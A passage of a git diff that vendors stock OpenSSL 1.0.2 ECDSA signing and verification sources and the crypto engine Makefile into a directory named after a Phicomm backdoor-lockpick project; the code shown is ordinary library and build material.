+    /* calculate tmp1 = inv(S) mod order */
+    if (!BN_mod_inverse(u2, sig->s, order, ctx)) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ERR_R_BN_LIB);
+        goto err;
+    }
+    /* digest -> m */
+    i = BN_num_bits(order);
+    /*
+     * Need to truncate digest if it is too long: first truncate whole bytes.
+     */
+    if (8 * dgst_len > i)
+        dgst_len = (i + 7) / 8;
+    if (!BN_bin2bn(dgst, dgst_len, m)) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ERR_R_BN_LIB);
+        goto err;
+    }
+    /* If still too long truncate remaining bits with a shift */
+    if ((8 * dgst_len > i) && !BN_rshift(m, m, 8 - (i & 0x7))) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ERR_R_BN_LIB);
+        goto err;
+    }
+    /* u1 = m * tmp mod order */
+    if (!BN_mod_mul(u1, m, u2, order, ctx)) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ERR_R_BN_LIB);
+        goto err;
+    }
+    /* u2 = r * w mod q */
+    if (!BN_mod_mul(u2, sig->r, u2, order, ctx)) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ERR_R_BN_LIB);
+        goto err;
+    }
+
+    if ((point = EC_POINT_new(group)) == NULL) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    if (!EC_POINT_mul(group, point, u1, pub_key, u2, ctx)) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ERR_R_EC_LIB);
+        goto err;
+    }
+    if (EC_METHOD_get_field_type(EC_GROUP_method_of(group)) ==
+        NID_X9_62_prime_field) {
+        if (!EC_POINT_get_affine_coordinates_GFp(group, point, X, NULL, ctx)) {
+            ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ERR_R_EC_LIB);
+            goto err;
+        }
+    }
+#ifndef OPENSSL_NO_EC2M
+    else {                      /* NID_X9_62_characteristic_two_field */
+
+        if (!EC_POINT_get_affine_coordinates_GF2m(group, point, X, NULL, ctx)) {
+            ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ERR_R_EC_LIB);
+            goto err;
+        }
+    }
+#endif
+    if (!BN_nnmod(u1, X, order, ctx)) {
+        ECDSAerr(ECDSA_F_ECDSA_DO_VERIFY, ERR_R_BN_LIB);
+        goto err;
+    }
+    /*  if the signature is correct u1 is equal to sig->r */
+    ret = (BN_ucmp(u1, sig->r) == 0);
+ err:
+    BN_CTX_end(ctx);
+    BN_CTX_free(ctx);
+    if (point)
+        EC_POINT_free(point);
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_sign.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_sign.c
new file mode 100644
index 0000000..28652d4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_sign.c
@@ -0,0 +1,106 @@
+/* crypto/ecdsa/ecdsa_sign.c */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "ecs_locl.h"
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#include <openssl/rand.h>
+
+ECDSA_SIG *ECDSA_do_sign(const unsigned char *dgst, int dlen, EC_KEY *eckey)
+{
+    return ECDSA_do_sign_ex(dgst, dlen, NULL, NULL, eckey);
+}
+
+ECDSA_SIG *ECDSA_do_sign_ex(const unsigned char *dgst, int dlen,
+                            const BIGNUM *kinv, const BIGNUM *rp,
+                            EC_KEY *eckey)
+{
+    ECDSA_DATA *ecdsa = ecdsa_check(eckey);
+    if (ecdsa == NULL)
+        return NULL;
+    return ecdsa->meth->ecdsa_do_sign(dgst, dlen, kinv, rp, eckey);
+}
+
+int ECDSA_sign(int type, const unsigned char *dgst, int dlen, unsigned char
+               *sig, unsigned int *siglen, EC_KEY *eckey)
+{
+    return ECDSA_sign_ex(type, dgst, dlen, sig, siglen, NULL, NULL, eckey);
+}
+
+int ECDSA_sign_ex(int type, const unsigned char *dgst, int dlen, unsigned char
+                  *sig, unsigned int *siglen, const BIGNUM *kinv,
+                  const BIGNUM *r, EC_KEY *eckey)
+{
+    ECDSA_SIG *s;
+    RAND_seed(dgst, dlen);
+    s = ECDSA_do_sign_ex(dgst, dlen, kinv, r, eckey);
+    if (s == NULL) {
+        *siglen = 0;
+        return 0;
+    }
+    *siglen = i2d_ECDSA_SIG(s, &sig);
+    ECDSA_SIG_free(s);
+    return 1;
+}
+
+int ECDSA_sign_setup(EC_KEY *eckey, BN_CTX *ctx_in, BIGNUM **kinvp,
+                     BIGNUM **rp)
+{
+    ECDSA_DATA *ecdsa = ecdsa_check(eckey);
+    if (ecdsa == NULL)
+        return 0;
+    return ecdsa->meth->ecdsa_sign_setup(eckey, ctx_in, kinvp, rp);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_vrf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_vrf.c
new file mode 100644
index 0000000..e909aeb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ecdsa/ecs_vrf.c
@@ -0,0 +1,112 @@
+/* crypto/ecdsa/ecdsa_vrf.c */
+/*
+ * Written by Nils Larsch for the OpenSSL project
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "ecs_locl.h"
+#include <string.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+/*-
+ * returns
+ *      1: correct signature
+ *      0: incorrect signature
+ *     -1: error
+ */
+int ECDSA_do_verify(const unsigned char *dgst, int dgst_len,
+                    const ECDSA_SIG *sig, EC_KEY *eckey)
+{
+    ECDSA_DATA *ecdsa = ecdsa_check(eckey);
+    if (ecdsa == NULL)
+        return 0;
+    return ecdsa->meth->ecdsa_do_verify(dgst, dgst_len, sig, eckey);
+}
+
+/*-
+ * returns
+ *      1: correct signature
+ *      0: incorrect signature
+ *     -1: error
+ */
+int ECDSA_verify(int type, const unsigned char *dgst, int dgst_len,
+                 const unsigned char *sigbuf, int sig_len, EC_KEY *eckey)
+{
+    ECDSA_SIG *s;
+    const unsigned char *p = sigbuf;
+    unsigned char *der = NULL;
+    int derlen = -1;
+    int ret = -1;
+
+    s = ECDSA_SIG_new();
+    if (s == NULL)
+        return (ret);
+    if (d2i_ECDSA_SIG(&s, &p, sig_len) == NULL)
+        goto err;
+    /* Ensure signature uses DER and doesn't have trailing garbage */
+    derlen = i2d_ECDSA_SIG(s, &der);
+    if (derlen != sig_len || memcmp(sigbuf, der, derlen))
+        goto err;
+    ret = ECDSA_do_verify(dgst, dgst_len, s, eckey);
+ err:
+    if (derlen > 0) {
+        OPENSSL_cleanse(der, derlen);
+        OPENSSL_free(der);
+    }
+    ECDSA_SIG_free(s);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/Makefile
new file mode 100644
index 0000000..2ee6c72
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/Makefile
@@ -0,0 +1,433 @@
+#
+# OpenSSL/crypto/engine/Makefile
+#
+
+DIR=	engine
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST= enginetest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= eng_err.c eng_lib.c eng_list.c eng_init.c eng_ctrl.c \
+	eng_table.c eng_pkey.c eng_fat.c eng_all.c \
+	tb_rsa.c tb_dsa.c tb_ecdsa.c tb_dh.c tb_ecdh.c tb_rand.c tb_store.c \
+	tb_cipher.c tb_digest.c tb_pkmeth.c tb_asnmth.c \
+	eng_openssl.c eng_cnf.c eng_dyn.c eng_cryptodev.c \
+	eng_rdrand.c
+LIBOBJ= eng_err.o eng_lib.o eng_list.o eng_init.o eng_ctrl.o \
+	eng_table.o eng_pkey.o eng_fat.o eng_all.o \
+	tb_rsa.o tb_dsa.o tb_ecdsa.o tb_dh.o tb_ecdh.o tb_rand.o tb_store.o \
+	tb_cipher.o tb_digest.o tb_pkmeth.o tb_asnmth.o \
+	eng_openssl.o eng_cnf.o eng_dyn.o eng_cryptodev.o \
+	eng_rdrand.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= engine.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+eng_all.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_all.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_all.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_all.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_all.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_all.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eng_all.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eng_all.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+eng_all.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_all.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+eng_all.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+eng_all.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+eng_all.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_all.c eng_int.h
+eng_cnf.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_cnf.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_cnf.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+eng_cnf.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+eng_cnf.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+eng_cnf.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+eng_cnf.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+eng_cnf.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+eng_cnf.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+eng_cnf.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+eng_cnf.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+eng_cnf.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+eng_cnf.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+eng_cnf.o: ../cryptlib.h eng_cnf.c eng_int.h
+eng_cryptodev.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+eng_cryptodev.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+eng_cryptodev.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_cryptodev.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_cryptodev.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_cryptodev.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+eng_cryptodev.o: ../../include/openssl/obj_mac.h
+eng_cryptodev.o: ../../include/openssl/objects.h
+eng_cryptodev.o: ../../include/openssl/opensslconf.h
+eng_cryptodev.o: ../../include/openssl/opensslv.h
+eng_cryptodev.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+eng_cryptodev.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+eng_cryptodev.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+eng_cryptodev.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+eng_cryptodev.o: eng_cryptodev.c
+eng_ctrl.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_ctrl.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_ctrl.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_ctrl.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_ctrl.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_ctrl.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eng_ctrl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eng_ctrl.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+eng_ctrl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_ctrl.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+eng_ctrl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+eng_ctrl.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+eng_ctrl.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_ctrl.c eng_int.h
+eng_dyn.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_dyn.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_dyn.o: ../../include/openssl/crypto.h ../../include/openssl/dso.h
+eng_dyn.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+eng_dyn.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+eng_dyn.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+eng_dyn.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+eng_dyn.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+eng_dyn.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+eng_dyn.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+eng_dyn.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+eng_dyn.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+eng_dyn.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+eng_dyn.o: ../cryptlib.h eng_dyn.c eng_int.h
+eng_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+eng_err.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+eng_err.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+eng_err.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+eng_err.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+eng_err.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+eng_err.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+eng_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+eng_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+eng_err.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+eng_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+eng_err.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+eng_err.o: eng_err.c
+eng_fat.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_fat.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_fat.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+eng_fat.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+eng_fat.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+eng_fat.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+eng_fat.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+eng_fat.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+eng_fat.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+eng_fat.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+eng_fat.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+eng_fat.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+eng_fat.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+eng_fat.o: ../cryptlib.h eng_fat.c eng_int.h
+eng_init.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_init.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_init.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_init.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_init.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_init.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eng_init.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eng_init.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+eng_init.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_init.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+eng_init.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+eng_init.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+eng_init.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_init.c eng_int.h
+eng_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_lib.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_lib.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eng_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eng_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+eng_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+eng_lib.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+eng_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+eng_lib.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+eng_lib.o: ../cryptlib.h eng_int.h eng_lib.c
+eng_list.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_list.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_list.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_list.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_list.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_list.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eng_list.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eng_list.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+eng_list.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_list.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+eng_list.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+eng_list.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+eng_list.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h eng_list.c
+eng_openssl.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_openssl.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_openssl.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+eng_openssl.o: ../../include/openssl/dsa.h ../../include/openssl/dso.h
+eng_openssl.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+eng_openssl.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+eng_openssl.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+eng_openssl.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+eng_openssl.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+eng_openssl.o: ../../include/openssl/opensslconf.h
+eng_openssl.o: ../../include/openssl/opensslv.h
+eng_openssl.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+eng_openssl.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+eng_openssl.o: ../../include/openssl/rand.h ../../include/openssl/rc4.h
+eng_openssl.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+eng_openssl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+eng_openssl.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+eng_openssl.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_openssl.c
+eng_pkey.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_pkey.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_pkey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_pkey.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_pkey.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_pkey.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eng_pkey.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eng_pkey.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+eng_pkey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_pkey.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+eng_pkey.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+eng_pkey.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+eng_pkey.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h eng_pkey.c
+eng_rdrand.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+eng_rdrand.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+eng_rdrand.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+eng_rdrand.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+eng_rdrand.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+eng_rdrand.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+eng_rdrand.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+eng_rdrand.o: ../../include/openssl/opensslconf.h
+eng_rdrand.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_rdrand.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+eng_rdrand.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+eng_rdrand.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+eng_rdrand.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+eng_rdrand.o: eng_rdrand.c
+eng_table.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_table.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_table.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_table.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_table.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_table.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eng_table.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eng_table.o: ../../include/openssl/objects.h
+eng_table.o: ../../include/openssl/opensslconf.h
+eng_table.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
